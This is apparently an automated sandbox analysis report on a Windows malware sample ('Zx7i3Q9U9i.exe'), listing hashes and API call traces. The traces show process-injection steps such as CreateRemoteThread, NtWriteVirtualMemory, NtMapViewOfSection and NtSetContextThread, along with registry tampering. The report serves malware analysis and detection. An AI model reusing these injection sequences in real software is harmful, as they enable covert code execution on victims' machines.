    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:2B6E31835DAF786F3E9DEEC103C208BB
Total matches:31
Initial Analysis Report:Open
Initial sample Analysis ID:66847
Initial sample SHA 256:B16B34A6AF7AEFE6C0210917A2EC747838573CEA6658CDB6CB3D8F937E70F953
Initial sample name:file.exe

Similar Executed Functions

Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
